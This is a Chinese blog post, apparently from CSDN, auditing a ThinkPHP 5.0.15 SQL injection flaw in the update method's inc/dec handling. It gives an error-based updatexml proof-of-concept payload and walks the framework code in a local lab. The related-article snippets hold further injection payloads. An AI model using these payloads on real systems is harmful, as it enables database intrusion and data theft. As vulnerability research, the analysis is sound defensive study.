12-PHP代码审计——ThinkPHP5.0.15 update注入分析

最新推荐文章于 2024-08-11 19:27:09 发布
最新推荐文章于 2024-08-11 19:27:09 发布
阅读量832 收藏
点赞数
分类专栏: 网络安全 文章标签: php thinkphp sql注入 安全漏洞 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35733751/article/details/116379363
版权

环境:

thinkphp_5.0.15_full

poc:

level[0]=inc&level[1]=updatexml(1,concat(0x7,user(),0x7e),1)&level[2]=1

 

下载ThinkPHP5.0.15解压到www.tptest.com目录下,并在phpstudy中将域名站点的网站目录改为ThinkPHP5.0.15的public目录。

在application目录的config.php文件中开启跟踪调试模式,如下所示:

// 应用调试模式
'app_debug'              => true,
// 应用Trace
'app_trace'              => true,

 

然后在application目录的database.php文件中配置数据库

// 数据库类型
'type'            => 'mysql',
// 服务器地址
'hostname'        => '127.0.0.1',
// 数据库名
'database'        => 'thinkphp32',
// 用户名
'username'        => 'root',
// 密码
'password'        => '123456',
// 端口
'hostport'        => '3306',

 

如果出现以下画面说明配置正常

 

update注入示例程序:

class Index
{
    public function index()
    {
        ///a表示以数组接收level
        $level = input("level/a");
        $data = db("users")->where("id" , 1)->update(["level"=>$level]);
        dump($data);
    }
}

thinkphp提供了input函数来接收数据,那么问题是input函数是如何接收提交的参数?

 

访问网址提交poc:

网页返回了错误信息,直接把数据库的用户信息爆出来了。

 

在input函数中,内部有两个函数比较重要:filterValue和typeCast

public function input($data = [], $name = '', $default = null, $filter = ''){
    if (false === $name) {
        // 获取原始数据
        return $data;
    }
    $name = (string) $name;
    if ('' != $name) {
        // 解析name,提取数据
        if (strpos($name, '/')) {
            list($name, $type) = explode('/', $name);
        } else {
            $type = 's';
        }
        // 按.拆分成多维数组进行判断
        foreach (explode('.', $name) as $val) {
            if (isset($data[$val])) {
                $data = $data[$val];
            } else {
                // 无输入数据,返回默认值
                return $default;
            }
        }
        if (is_object($data)) {
            return $data;
        }
    }
    //后面的操作都是对数据过滤,强转
    // 解析过滤器
    if (is_null($filter)) {
        $filter = [];
    } else {
        $filter = $filter ?: $this->filter;
        if (is_string($filter)) {
            $filter = explode(',', $filter);
        } else {
            $filter = (array) $filter;
        }
    }

    $filter[] = $default;
    if (is_array($data)) {
        array_walk_recursive($data, [$this, 'filterValue'], $filter);
        reset($data);
    } else {
        //提取数据并过滤
        $this->filterValue($data, $name, $filter);
    }

    if (isset($type) && $data !== $default) {
        // 强制数据类型转换
        $this->typeCast($data, $type);
    }
    return $data;
}

 

filterValue函数内部实际是使用了filterExp函数过滤特殊关键字,如下所示:

public function filterExp(&$value){
        // 过滤查询特殊字符
        if (is_string($value) && preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i', $value)) {
            $value .= ' ';
        }
}

如果提交的数据中出现了以上这些关键字的话,都会被过滤掉

 

 

typeCast函数内部会会对数据进行数据类型转换,支持以下数据类型转换

    private function typeCast(&$data, $type){
        switch (strtolower($type)) {
            // 数组
            case 'a':
                $data = (array) $data;
                break;
            // 数字
            case 'd':
                $data = (int) $data;
                break;
            // 浮点
            case 'f':
                $data = (float) $data;
                break;
            // 布尔
            case 'b':
                $data = (boolean) $data;
                break;
            // 字符串
            case 's':
            default:
                if (is_scalar($data)) {
                    $data = (string) $data;
                } else {
                    throw new \InvalidArgumentException('variable type error:' . gettype($data));
                }
        }
    }

 

thinkphp5.0.15操作数据库操作流程:

db()  -->  where()  -->  update()

 

db()函数主要是实例化数据库的一些初始化操作,where函数内部是一些赋值操作,我们重点从update函数开始分析:

 public function update(array $data = []){
    //提取数据进行赋值
    $options = $this->parseExpress();
    $data    = array_merge($options['data'], $data);
    $pk      = $this->getPk($options);
    if (isset($options['cache']) && is_string($options['cache']['key'])) {
        $key = $options['cache']['key'];
    }

    if (empty($options['where'])) {
        // 如果存在主键数据 则自动作为更新条件
        if (is_string($pk) && isset($data[$pk])) {
            $where[$pk] = $data[$pk];
            if (!isset($key)) {
                $key = 'think:' . $options['table'] . '|' . $data[$pk];
            }
            unset($data[$pk]);
        } elseif (is_array($pk)) {
            // 增加复合主键支持
            foreach ($pk as $field) {
                if (isset($data[$field])) {
                    $where[$field] = $data[$field];
                } else {
                    // 如果缺少复合主键数据则不执行
                    throw new Exception('miss complex primary data');
                }
                unset($data[$field]);
            }
        }
        if (!isset($where)) {
            // 如果没有任何更新条件则不执行
            throw new Exception('miss update condition');
        } else {
            $options['where']['AND'] = $where;
        }
    } elseif (!isset($key) && is_string($pk) && isset($options['where']['AND'][$pk])) {
        $key = $this->getCacheKey($options['where']['AND'][$pk], $options, $this->bind);
    }

    // 生成UPDATE SQL语句,这里又调用了一次update函数
    $sql = $this->builder->update($data, $options);
    // 获取参数绑定
    $bind = $this->getBind();
    if ($options['fetch_sql']) {
        // 获取实际执行的SQL语句
        return $this->connection->getRealSql($sql, $bind);
    } else {
        // 检测缓存
        if (isset($key) && Cache::get($key)) {
            // 删除缓存
            Cache::rm($key);
        } elseif (!empty($options['cache']['tag'])) {
            Cache::clear($options['cache']['tag']);
        }
        // 执行操作
        $result = '' == $sql ? 0 : $this->execute($sql, $bind);
        if ($result) {
            if (is_string($pk) && isset($where[$pk])) {
                $data[$pk] = $where[$pk];
            } elseif (is_string($pk) && isset($key) && strpos($key, '|')) {
                list($a, $val) = explode('|', $key);
                $data[$pk]     = $val;
            }
            $options['data'] = $data;
            $this->trigger('after_update', $options);
        }
        return $result;
    }
}

update函数内部又调用了一个update函数

 

update函数中接收的数组data是一个数组level,其实就是之前我们提交的poc,写成数组的目的是为了绕过后面的过滤。

 

 

在这个update函数中有几个函数比较关键

public function update($data, $options){
    //提取数据
    $table = $this->parseTable($options['table'], $options);
    //解析data,这里的data是level数组
    $data  = $this->parseData($data, $options);
    if (empty($data)) {
        return '';
    }
    foreach ($data as $key => $val) {
        $set[] = $key . '=' . $val;
    }

    //过滤的核心函数
    $sql = str_replace(
        ['%TABLE%', '%SET%', '%JOIN%', '%WHERE%', '%ORDER%', '%LIMIT%', '%LOCK%', '%COMMENT%'],
        [
            $this->parseTable($options['table'], $options),
            implode(',', $set),
            $this->parseJoin($options['join'], $options),
            $this->parseWhere($options['where'], $options),
            $this->parseOrder($options['order'], $options),
            $this->parseLimit($options['limit']),
            $this->parseLock($options['lock']),
            $this->parseComment($options['comment']),
        ], $this->updateSql);

    return $sql;
}

parseTable函数会把表拿出来赋值,parseData函数会对level的内容进行解析,这里我们要重点分析parseData函数对level数组做了哪些处理。

 

分析parseData函数:

protected function parseData($data, $options){
    if (empty($data)) {
        return [];
    }

    // 获取绑定信息
    $bind = $this->query->getFieldsBind($options['table']);
    if ('*' == $options['field']) {
        $fields = array_keys($bind);
    } else {
        $fields = $options['field'];
    }

    $result = [];
    //取出level数组中的数据,分别放入key和val
    foreach ($data as $key => $val) {
        //解析key
        $item = $this->parseKey($key, $options);
        if (is_object($val) && method_exists($val, '__toString')) {
            // 对象数据写入
            $val = $val->__toString();
        }
        if (false === strpos($key, '.') && !in_array($key, $fields, true)) {
            if ($options['strict']) {
                throw new Exception('fields not exists:[' . $key . ']');
            }
        } elseif (is_null($val)) {
            $result[$item] = 'NULL';
        //val是否为数组
        } elseif (is_array($val) && !empty($val)) {
            switch ($val[0]) {
                case 'exp':
                    $result[$item] = $val[1];
                    break;
                case 'inc':
                    $result[$item] = $this->parseKey($val[1]) . '+' . floatval($val[2]);
                    break;
                case 'dec':
                    $result[$item] = $this->parseKey($val[1]) . '-' . floatval($val[2]);
                    break;
            }
        } elseif (is_scalar($val)) {
            // 过滤非标量数据
            if (0 === strpos($val, ':') && $this->query->isBind(substr($val, 1))) {
                $result[$item] = $val;
            } else {
                $key = str_replace('.', '_', $key);
                $this->query->bind('data__' . $key, $val, isset($bind[$key]) ? $bind[$key] : PDO::PARAM_STR);
                $result[$item] = ':data__' . $key;
            }
        }
    }
    return $result;
}

parseData函数将data数组中的内容取出来放入val中然后过滤,此时的val仍然是一个数组。

 

val当满足条件后,会取出val的第一个元素进行匹配,如果匹配到inc就会执行图中这行代码,parseKey函数解析了val[1]和val[2]

这行代码执行时会把val[1]和val[2]的内容拼接起来,$result[$item]中拼接成的内容是这样的updatexml(1,concat(0x7,user(),0x7e),1)+1。

因为parseKey函数虽然对key的内容做了过滤,但这里只过滤了特殊字符然后将key返回,所以这里key的内容仍然还是:updatexml(1,concat(0x7,user(),0x7e),1),之前的poc用数组的方式提交目的是为了在这里绕过过滤。

 

 

继续跟进parseKey函数如何解析val的内容

protected function parseKey($key, $options = []){
    $key = trim($key);
    //这个if没有过滤
    if (strpos($key, '$.') && false === strpos($key, '(')) {
        // JSON字段支持
        list($field, $name) = explode('$.', $key);
        $key                = 'json_extract(' . $field . ', \'$.' . $name . '\')';
    } elseif (strpos($key, '.') && !preg_match('/[,\'\"\(\)`\s]/', $key)) {
        list($table, $key) = explode('.', $key, 2);
        if ('__TABLE__' == $table) {
            $table = $this->query->getTable();
        }
        if (isset($options['alias'][$table])) {
            $table = $options['alias'][$table];
        }
    }
    //过滤特殊字符
    if (!preg_match('/[,\'\"\*\(\)`.\s]/', $key)) {
        $key = '`' . $key . '`';
    }
    if (isset($table)) {
        if (strpos($table, '.')) {
            $table = str_replace('.', '`.`', $table);
        }
        $key = '`' . $table . '`.' . $key;
    }
    return $key;
}

接下来还调用了核心过滤函数str_replace,但是str_replace函数内部没有对$result[$item]的内容进行过滤,它只过滤了where子单元的内容,这样sql语句就绕过了后台的过滤。

 

update函数中返回的sql语句是这样的:

execute函数在执行该sql语句会报错,同时还会爆出数据库的用户信息。

到此,漏洞分析结束。

 

song->_->
关注
专栏目录
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析
11-28 1182
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析 ThinkPHP5.0.13-ThinkPHP5.0.15/ThinkPHP5.1.0-ThinkPHP5.1.5 漏洞代码<?php namespace app\index\controller; class Index{ public function index(){ $username = request()->get('username\a'); db('users')-
ThinkPHP v5.0.15 完整版
02-06
软件介绍 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,经历了三年多发展的同时,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和 改进,众多的典型案例确保可以稳定用于商业以及门户级的开发。 ThinkPHP借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,采用单一入口模式等,融合了Struts的 Action思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,封装了CURD和一些常用操作,在项目配置、类 库导入、模版引擎、查询语言、自动验证、视图模型、项目编译、缓存机制、SEO支持、分布式数据库、多数据库连接和切换、认证机制和扩展性方面均有独特的 表现。 使用ThinkPHP,你可以更方便和快捷的开发和部署应用。当然不仅仅是企业级应用,任何PHP应用开发都可以从ThinkPHP的简单 和快速的特性中受益。ThinkPHP本身具有很多的原创特性,并且倡导大道至简,开发由我的开发理念,用最少的代码完成更多的功能,宗旨就是让WEB应 用开发更简单、更快速。为此ThinkPHP会不断吸收和融入更好的技术以保证其新鲜和活力,提供WEB应用开发的最佳实践! ThinkPHP遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业产 品发布/销售。 ThinkPHP v5.0.15 更新日志: 改进View类 改进chunk方法 改进模板引擎的表达式语法 改进自关联查询多级调用问题 关联定义增加`selfRelation`方法用于设置是否自关联 改进file类型的缓存`inc`和`dec`方法不改变缓存有效期 改进软删除 支持设置`deleteTime`属性关闭 改进`union`查询 改进查询缓存 优化File缓存自动生成空目录的问题 改进日志写入并发问题 修正`MorphTo`关联 改进`join`自关联查询 改进`case`标签解析 改进Url类对`url_convert`配置的支持
Thinkphp5.0.15 SQL注入
feng的博客
03-05 1791
前言 刚把tp5的RCE给审的差不多了,审的很爽,接下来审一下thinkphp5各个版本的SQL注入。 代码不用说了,composer先下载下来。 composer create-project topthink/think=5.0.15 thinkphp5.0.15 下载来的%99都是版本不对,改一下composer.json 然后composer update就可以了。 index控制器那里写一下insert语句: class Index { public function index()
ThinkPHP5.0.15漏洞解析及SQL注入
最新发布
m0_70638961的博客
08-11 346
通过查看5.0.155.0.16版本的对比,可以看到16版本对在Builder.php里面对数据库的增减做了修正,所以可以15版本的漏洞就存在在这里。这里的代码用的拼接的方式,就可以尝试使用报错注入来实现。到了这里就发现,我们注入的三个值在这里派上了用场,val[1]就是注入的报错语句,这里走完,返回的就是报错注入语句+1,接下来我们继续走,一直走到这里。为了清楚代码是怎么走的,我们可以在insert()打一个断点,重新提交后就可以进入断点了,这里我们可以看到username有三个值。
ThinkPHP5.0.15代码审计SQL注入
D.MIND 的博客
05-04 578
文章目录环境搭建分析payload:修复 环境搭建 到composer.json填写版本 到application/index/controller/Index.php中配置: public function index()//控制方法 { $username = request()->get('username/a'); db('users')->insert(['username'=>$username]); return 'Update success'; }
ThinkPHP 模型进行更新记录报错:miss update condition
热门推荐
潘广宇的博客
04-24 1万+
本人使用的是ThinkPHP 5.0.24,报错信息: object(think\Exception)[17] protected 'data' => array (size=0) empty protected 'message' => string 'miss update condition' 一、报错程序代码 $model = new Mo...
thinkphp-log-analyse:ThinkPHP日志分析
05-07
《深入解析ThinkPHP日志分析工具thinkphp-log-analyse》 在Web开发过程中,日志分析是一项重要的任务,它能帮助开发者理解系统的运行状态,定位问题,优化性能。ThinkPHP,作为国内广泛使用的PHP框架,其日志系统是...
tp6-vue-admin:基于thinkphp6+vue2.6+element2.13 前后端分离落地解决方案
05-02
#thinkphp6+vue2.6+element2.13 前后端分离落地解决方案 本人开发环境版本信息: npm=6.13.4 vue =@vue/cli 4.1.2 node=v12.14.1 #注意1:vue-admin 中接口请求规则和动态路由,是对应tp6 中的接口规则和权限规则,...
ThinkPHP 开发框架 v5.0.15 核心版
11-25
ThinkPHP 5.0.15核心版:构建高效Web应用的基石》 ThinkPHP,作为一款广受赞誉的开源PHP开发框架,以其简洁、快速、面向对象的设计理念,为开发者提供了强大的工具箱,助力敏捷Web应用和企业级项目的开发。在v...
13-PHP代码审计——ThinkPHP5.0.15聚合查询漏洞分析
网络安全
05-06 609
漏洞环境: ThinkPHP5.0.15 <= 漏洞影响版本 poc: id),(select sleep(5)),(username id),(updatexml(1,concat(0x7,database(),0x7e),1) 什么是聚合查询? mysql数据库中有一张users表用于存储用户信息,假如我们想要查询users表中有多少个用户的记录,可以直接执行select * from users sql语句来获取用户的个数记录,但是这样做的效率非常低,因为我们只想..
ThinkPHP5.1.x SQL注入update方法)
LYJ20010728的博客
08-13 1363
ThinkPHP5 SQL注入update方法)漏洞概要初始配置 漏洞概要 本次漏洞存在于 Mysql 类的 parseArrayData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生 漏洞影响版本: 5.1.6<=ThinkPHP<=5.1.7 (非最新的 5.1.8 版本也可利用) 初始配置 获取测试环境代码 composer create-project --prefer-dist topthink/think tpd
一次复现审计ThinkPHP5.0.15版本的sql注入
p_utao的博客
01-22 316
关于tp框架 ThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。
php批量update数组,thinkphp 批量更新
weixin_39527487的博客
03-10 696
更新记录的时注意,更新是针对记录(基于主键所代表的记录),因此任何更新,都必须带有主键字段。/***批量更新数据*@paramstring$table_name*@paramarray$data*@paramstring$field*@returnbool|false|int*/functiondb_batch_update($table_name='',$data=ar...
thinkphp3.2 update注入
qq_42307546的博客
07-11 465
php
thinkphp自定义url_渗透记实|ThinkPhp绕过限制GetShell
weixin_39623671的博客
12-16 985
0x01 前言项目里遇到一个站,用的是ThinkPHP V5.0.*框架,且开启了debug模式,本以为一发payload的就能解决的事情,没想到拿下的过程还得小绕一下...0x02 踩坑尝试命令执行,system被限制了尝试包含日志文件,open_basedir限制了这里有个思路,可以去包含runtime下的日志文件,但是thinkphp的日志文件比较大,而且有时候会有很多奇怪的问题阻...
Thinkphp 5.1.24 parseKey缺陷导致聚合注入 分析
weixin_30746117的博客
08-07 111
测试url: http://127.0.0.1/thinkphp/thinkphp_5.1.24/public/index.php/index/index/sqli2?id=2 控制器是获取id参数作为进行聚合查询的字段名,如下图所示 看一下存在漏洞的parseKey方法 可以看到,这里直接在$key的前后加上反引号就直接返回了。根据前面几个漏洞的分析我们可以知道parseKey是...
审计php框架,关于ThinkPHP框架的审计
weixin_33307540的博客
04-15 133
下面由thinkphp框架教程栏目给大家介绍有关ThinkPHP框架的审计,希望对需要的朋友有所帮助!ThinkPHP简介ThinkPHP是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也...
ThinkPHP5.0.15核心版遇到不能调用common.php中方法
zctsir的博客
03-28 6360
以前用tp5框架,在common.php这个文件中写的方法都能直接使用的,这次使用过程中却出现了找不到其中方法的情况,应该是更新了,导致common.php这个公共函数文件不能自动加载了,解决方法如下:打开config.php,找到// 扩展函数文件 'extra_file_list' =&gt; [THINK_PATH . 'helper' . EXT],发现自动加载的是think...
condition update在分布式系统中设计
chenglinhust的专栏
07-02 807
condition update在分布式系统中设计  1.   定义       condition update称为条件更新,用于分布式系统中数据一致性,能够保证在并发操作数据时的正确性。   2.   方式      1.  可以通过version来保证condition update,每一次对文件的更新都产生一个version,而且客户端可以拿到这个versio
ThinkPHP3.2.3 SQL注入分析update注入详解
"think3.2.3_sql注入分析1" ...这个文章详细分析ThinkPHP 3.2.3中的一个SQL注入漏洞,揭示了框架在处理动态绑定参数时的安全隐患,提醒开发者在编写代码时必须重视数据安全,采取有效的防御措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值